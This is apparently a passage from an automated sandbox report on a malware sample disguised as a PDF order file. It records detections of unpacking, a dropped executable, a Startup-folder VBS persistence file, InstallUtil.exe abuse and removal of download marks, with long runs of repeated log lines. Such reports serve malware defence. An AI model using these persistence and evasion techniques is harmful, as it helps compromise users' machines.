                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Order88983273293729387293828PDF.exe, 00000000.00000002.1734653800.0000000004810000.00000004.08000000.00040000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000003882000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.0000000002B6C000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.00000000037E5000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: Order88983273293729387293828PDF.exe, 00000000.00000002.1738793310.0000000006950000.00000004.08000000.00040000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000004139000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: Order88983273293729387293828PDF.exe, 00000000.00000002.1738793310.0000000006950000.00000004.08000000.00040000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000004139000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: Order88983273293729387293828PDF.exe, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Order88983273293729387293828PDF.exe.41b4a90.4.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 0.2.Order88983273293729387293828PDF.exe.41b4a90.4.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 0.2.Order88983273293729387293828PDF.exe.41b4a90.4.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 0.2.Order88983273293729387293828PDF.exe.41b4a90.4.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 0.2.Order88983273293729387293828PDF.exe.41b4a90.4.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Source: 0.2.Order88983273293729387293828PDF.exe.6950000.11.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 0.2.Order88983273293729387293828PDF.exe.6950000.11.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 0.2.Order88983273293729387293828PDF.exe.6950000.11.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 0.2.Order88983273293729387293828PDF.exe.6950000.11.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 0.2.Order88983273293729387293828PDF.exe.6950000.11.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Source: 0.2.Order88983273293729387293828PDF.exe.38d0890.6.raw.unpack, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                    Yara detected Costura Assembly Loader
                    Source: Yara matchFile source: 3.2.MaxGeneration.exe.4c82c50.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Order88983273293729387293828PDF.exe.6aa0000.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1722029295.00000000028D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1884455692.0000000004C3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1739089307.0000000006AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1861458458.0000000003548000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Order88983273293729387293828PDF.exe PID: 180, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MaxGeneration.exe PID: 1344, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_078C2310 push es; ret 1_2_078C231C
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeFile created: C:\Users\user\AppData\Roaming\MaxGeneration.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.logJump to behavior

                    Boot Survival

                    barindex
                    Drops VBS files to the startup folder
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MaxGeneration.vbsJump to dropped file
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MaxGeneration.vbsJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MaxGeneration.vbsJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
